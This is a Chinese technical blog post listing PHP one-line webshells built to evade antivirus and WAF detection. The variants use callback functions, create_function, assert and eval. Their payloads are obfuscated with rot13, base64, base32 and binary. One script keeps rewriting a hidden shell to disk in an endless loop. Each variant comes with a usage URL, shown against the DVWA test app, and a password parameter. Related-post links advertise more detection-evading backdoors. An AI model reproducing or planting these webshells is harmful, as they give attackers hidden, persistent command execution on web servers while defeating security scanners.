免杀一句话

最新推荐文章于 2024-04-14 05:32:51 发布
最新推荐文章于 2024-04-14 05:32:51 发布
阅读量333 收藏 1
点赞数 1
分类专栏: Web渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45647970/article/details/115202271
版权 
<?php
array_map($_GET[func], array($_POST[cmd]));
?>

利用方式http://localhost/dvwa/hackable/uploads/nb.php?func=assert 密码为cmd

-----------------------------------------------------------------------------------------

<?php
$_GET['a']($_POST['b']);
?>

利用方式http://localhost/dvwa/hackable/uploads/nb.php?a=assert 密码为b

-----------------------------------------------------------------------------------------

<?php
$cmd = $_REQUEST['cmd'];
$arr = array($cmd);
$func = $_REQUEST['func'];
array_filter($arr, $func);
?>

利用方式http://localhost/dvwa/hackable/uploads/nb.php?func=assert 密码为cmd
array_filter()
第一个参数为数组,第二个参数为回调函数。这个函数的作用就是将array数组中的每个值传递给回调函数做参数。
-----------------------------------------------------------------------------------------

<?php
$func = create_function('', $_POST['cmd']);
$func();
?>

利用方式http://localhost/dvwa/hackable/uploads/nb.php 密码为cmd

create_function的实现步骤:

  1. 获取参数, 函数体;
  2. 拼凑一个"function __lambda_func (参数) { 函数体;} "的字符串;
  3. eval;
  4. 通过__lambda_func在函数表中找到eval后得到的函数体, 找不到就出错;
  5. 定义一个函数名:"\000_lambda_" . count(anonymous_functions)++;
  6. 用新的函数名替换__lambda_func;
  7. 返回新的函数。
  8. 参考链接 https://www.t00ls.net/articles-20774.html
    (可以做成图片马)
    ---------------------------------------------------------------------------------------------
<?php
class One{
function Sn0w($x){
$c=str_rot13('n!ff!re!nffreg');
$str=explode('!',$c)[3];
$str($x);
}
}
$test=new One();
$test->Sn0w($_REQUEST['x']);
?>

利用方式http://localhost/dvwa/hackable/uploads/nb.php 密码为x
(可以做成图片马)
-----------------------------------------------------------------------------------------
上传一个php文件名为miansha.php

<?php

set_time_limit(1);

ignore_user_abort(true);

$file = 'phpinfo.php';

$shell =

"PD9waHAKCSRzdHIxID0gJ2FIKFVVSChmc2RmSChVVUgoZnNkZixmZGdkZWZqZzBKKXImJUYlKl5HKnQnOwoJJHN0cjIgPSBzdHJ0cigkc3RyMSxhcnJheSgnYUgoVVVIKGZzZGZIKFVVSChmc2RmLCc9PidhcycsJ2ZkZ2RlZmpnMEopJz0+J3NlJywnciYlRiUqXkcqdCc9PidydCcpKTsKCSRzdHIzID0gc3RydHIoJHN0cjIsYXJyYXkoJ3MsJz0+J3MnLCdmZGdkZWZqZzBKKXImJUYlKl5HKic9PidlcicpKTsKCWlmKG1kNShAJF9HRVRbJ2EnXSkgPT0nZTEwYWRjMzk0OWJhNTlhYmJlNTZlMDU3ZjIwZjg4M2UnKXsKCQkkc3RyNCA9IHN0cnJldigkX1BPU1RbJ2EnXSk7CgkJJHN0cjUgPSBzdHJyZXYoJHN0cjQpOwoJCSRzdHIzKCRzdHI1KTsKICAgIH0KPz4=";

while(true){

file_put_contents($file,base64_decode($shell));

usleep(50);

}

?>

利用方式先执行miansha.php就是http://localhost/dvwa/hackable/uploads/miansha.php就会生成一个phpinfo.php文件
再利用http://localhost/dvwa/hackable/uploads/phpinfo.php?a=123456 密码为a
-----------------------------------------------------------------------------------------

<?php
class KUYE{
      public $DAXW = null;
      public $LRXV = null;
      function __construct(){
      $this->DAXW = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
      $this->LRXV = @SYXJ($this->DAXW);
      @eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
      }}
new KUYE();
function MNWK($QSFX){
  $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
  $NLHB = '';
  $v = 0;
  $vbits = 0;
  for ($i = 0, $j = strlen($QSFX); $i < $j; $i++){
  $v <<= 8;
      $v += ord($QSFX[$i]);
      $vbits += 8;
      while ($vbits >= 5) {
          $vbits -= 5;
          $NLHB .= $BASE32_ALPHABET[$v >> $vbits];
          $v &= ((1 << $vbits) - 1);}}
  if ($vbits > 0){
      $v <<= (5 - $vbits);
      $NLHB .= $BASE32_ALPHABET[$v];}
  return $NLHB;}
function SYXJ($QSFX){
  $NLHB = '';
  $v = 0;
  $vbits = 0;
  for ($i = 0, $j = strlen($QSFX); $i < $j; $i++){
      $v <<= 5;
      if ($QSFX[$i] >= 'a' && $QSFX[$i] <= 'z'){
          $v += (ord($QSFX[$i]) - 97);
      } elseif ($QSFX[$i] >= '2' && $QSFX[$i] <= '7') {
          $v += (24 + $QSFX[$i]);
      } else {
          exit(1);
      }
      $vbits += 5;
      while ($vbits >= 8){
          $vbits -= 8;
          $NLHB .= chr($v >> $vbits);
          $v &= ((1 << $vbits) - 1);}}
  return $NLHB;}
?>

这是base32编码payload,利用方式http://localhost/dvwa/hackable/uploads/nb.php 密码为zero
-----------------------------------------------------------------------------------------

<?php

class KUYE{
        public $DAXW = null;
        public $LRXV = null;
        function __construct(){
        $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 1001111 1010011 1010100 1011011 1111010 1100101 1110010 1101111 1011101 101001 111011';
        $this->LRXV = @BinToStr($this->DAXW);
        @eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");
        }}
new KUYE();
function BinToStr($str){
    $arr = explode(' ', $str);
    foreach($arr as &$v){
        $v = pack("H".strlen(base_convert($v, 2, 16)), base_convert($v, 2, 16));
    }

    return join('', $arr);
}
?>

二进制转化payload,利用方式http://localhost/dvwa/hackable/uploads/nb.php 密码为zero
-----------------------------------------------------------------------------------------

<?php

class pure
{
  public $a = '';
  function __destruct(){

    assert("$this->a");
  }
}
$b = new pure;
$b->a = $_POST['zero'];
function mysubstr($string, $start = 0, $length = null) {
    $result = '';
    $strLength = strlen($string);
    if ($length === null) {
        $length = $strLength;
    }
    $length = (int) $length;
    $start = $start < 0 ? ($strLength + $start) : ($start);
    $end = $length < 0 ? ($strLength + $length) : $start + $length;
    if ($start > $strLength || ($end - $start) === 0) {
        return $result;
    }
    for (; $start < $end; $start ++) {
        $result .= $string[$start];
    }
    return $result;
}
?>

利用方式http://localhost/dvwa/hackable/uploads/nb.php 密码为zero

Blaov
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红队免杀一句话木马的套路
zxcvbnmasdflzl的博客
05-25 654
红队免杀一句话木马的套路
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3072
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
一句话木马免杀,看完99%的人都学会了
最新发布
2401_83739727的博客
04-14 970
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
免杀PHP一句话木马(把阿里云给过了)
weixin_50464560的博客
05-21 5057
免杀PHP一句话木马:https://www.cnblogs.com/sunny11/p/13680612.html 原酒仙桥文章:(这是全部渗透过程)https://mp.weixin.qq.com/s?__biz=MzAwMzYxNzc1OA==&mid=2247487032&idx=1&sn=c124a25ededa31f3d695e906fbcb752d&chksm=9b392889ac4ea19fa2b7e02c6048b697ed00924e64d93d3f037
一句话木马及免杀
热门推荐
Lum1n0us's Blog
08-12 1万+
这篇文章主要是总结一句话木马,并实现一句话木马的简单免杀,以及一个不死马的实现。 文章目录一句话木马及原理一句话木马简单免杀一、assert()二、字符串拼接三、函数四、request请求五、类六、base64加解密七、写入木马不死马 一句话木马及原理 首先,来看最简单的一句话木马: <?php @eval($_POST['cmd']); ?> 前面的<?php ?>是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_PO
php免杀一句话2018,经验分享 | 一句话免杀编写思路
weixin_39785081的博客
03-10 361
*本文原创作者:crhua,本文属FreeBuf原创奖励计划,未经许可禁止转载前言在渗透测试时,我们向网站服务器写入一句话webshell时,往往会被某狗,某锁,某卫士拦截,导致我们拿不下shell。一句话webshell的工作原理:当前PHP脚本会去读取并执行变量中的内容。文章我介绍两种方法:1.eval/assert花式变形2.写入缓存,执行webshelleval/assert 花式变形...
PHP大马过狗代码.php
05-31
该文件为PHP代码的大马,通过该文件,可以很好的绕过安全狗的检测,进而链接服务器。相关链接为https://download.csdn.net/download/wychy2008/10318498
PHP一句话 免杀
10-23
PHP一句话 免杀
免杀PHP大马过狗
06-13
PHP后门通常是一段简短的、能够执行特定命令的PHP代码,被称为“一句话木马”,这与给定的标签“一句话”相符。这些后门可能隐藏在正常代码中,或者伪装成看似无害的文件,例如在本例中的“php免杀大马过狗狗.php”...
安全狗的aspx一句话webshell
02-08
安全狗的aspx一句话webshell 纯CS模式,经典免杀
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀的PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
ASP超强提权免杀珍藏版.rar
05-29
ASP超强提权免杀珍藏版.rar
免杀代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
简单的一句话木马免杀
2301_77927094的博客
12-21 546
是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_POST['cmd']通过cmd这个参数post提交数据。从上面的演示中可以看到一句话木马的简单、高效,但就是因为其过于简单,查杀起来也很方便,所以要对其进行变形,让它不容易被发现。可以看到普通的一句话木马能被低版本的D盾直接扫出,所以免杀必不可少。可以看到这种方法绕过了2.0.8版本的D盾,初步可以得知这个版本的D盾使用的是关键字特征查杀。必需,规定在字符串的何处开始替换。
内联函数online的定义和作用
qq_44667165的博客
09-26 3545
说明: 内联函数是一个小型函数,以牺牲空间来节省函数调用带来的额外开销,一般用以比较小函数或者使用频率很高的函数,函数内部内部没有复杂的语句,如开关语句switch,循环语句for等 定义: (1)在 C++ 中,可以在定义函数时,在返回值类型前面加上 inline 关键字 inline int max() { ...... return 0; } (二)直接在类的内部进行函数的声明和定义,则默认其是内联函数 class A { public: int max() { ...... ret
一键免杀D盾(免杀一句话无限生成) ——yzddMr6
yzddMr6的博客
11-06 1612
前言 最近逛帖子发现好多人还在找各种免杀一句话。。。 都9102年了 都不知道有webshell-venom这个东西吗。。。 看来我的宣传还是不到位。。。 再给大家介绍一下吧 项目地址: https://github.com/yzddmr6/webshell-venom 蚁剑插件版: https://github.com/yzddmr6/as_webshell_venom 自己几个...
渗透干货|史上最全一句话木马
Python栈
03-15 4928
/可执行命令一句话密码-7ASPX一句话的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp原来代码是 把标签修改替换下来 为execute request(“cmd”) 这样就避开了符号!表中数据段限制,一句话木马也写不下的情况网络中流传的最小的木马代码是 如过连这也写不下怎么办?
65.远控免杀专题(65)-shellcode免杀实践1
08-03
文章内容讲述了shellcode免杀实践,是对传统防火墙和防病毒软件检测的一种技术攻克方式。通过改变shellcode的结构和内容,使其在不被检测的情况下执行恶意代码。为了实现shellcode免杀,文章介绍了一些具体的技术和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值